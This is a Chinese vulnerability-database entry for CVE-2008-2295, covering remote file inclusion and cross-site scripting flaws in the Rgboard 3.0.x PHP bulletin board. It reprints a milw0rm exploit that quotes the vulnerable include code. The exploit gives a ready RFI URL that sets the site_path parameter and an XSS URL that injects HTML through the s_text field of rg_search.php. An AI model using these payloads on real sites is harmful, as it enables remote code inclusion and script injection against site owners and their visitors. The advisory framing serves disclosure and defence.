Rgboard 'bbs.lib.inc.php' 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115203 漏洞类型 跨站脚本
发布时间 2008-05-14 更新时间 2008-09-05
CVE编号 CVE-2008-2295 CNNVD-ID CNNVD-200805-238
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/5620
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-238
|漏洞详情
Rgboard3.0.12以及可能之前的版本中的rg_search.php存在跨站脚本攻击漏洞。远程攻击者可以借助s_text参数和其他未明向量,注入任意的web脚本或HTML。
|漏洞EXP
################################################
#    Rgboard 3.0.x  Multiple Vulnerabilities   #
#                  (RFI/XSS)                   #
################################################

/**/    Author::  e.wiZz!
 
/**/   Site::  www.balcanwarez.com 
 
/**/   Contact:: N/A :D
===========================================================
/**/   Script :: Rgboard
 
/**/   Vulnerable version :: 3.0.0/3.0.12

/**/ Not vulnerable :: 4.0 

/**/   Download :: www.rgboard.com
============================================================
 
[<Remote File Include>]

/**/ Vulnerable code,line 22:
\include\bbs.lib.inc.php

if (!defined(’BBS_LIB_INC_INCLUDED’)) {
define(’BBS_LIB_INC_INCLUDED’, 1);
// *start of include,eh?*

if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path

/**/  Exploit:

http://www.target.com/include/bbs.lib.inc.php?site_path=evilthingg0ezhere
             

[<XSS>]

/**/  Almost every field is vulnerable to xss,example(rg_search.php):
 
/**/  Live demo:
   http://xxx.com/rgboard/rg_search.php?bbs_id=search&page_no=2&s_text=%22%3E%3Ca+href%3D%22http%3A%2F%2Fbalcanwarez.com%22%3E%3Ch1%3EOvdje nesto bezze upises,boli me kita :D%3C%2Fh1%3E%3C%2Fa%3E        

 
==============================================================
/**/  Thanx : QKrun1x,F34R,aluigi,Nuclear,aluigi,str0ke
 
/**/ PozdraF : deckima s elitesecurity.org i cyber-underground.org
===============================================================

# milw0rm.com [2008-05-14]
|参考资料

来源:XF
名称:rgboard-rgsearch-xss(42432)
链接:http://xforce.iss.net/xforce/xfdb/42432
来源:BID
名称:29230
链接:http://www.securityfocus.com/bid/29230
来源:MILW0RM
名称:5620
链接:http://www.milw0rm.com/exploits/5620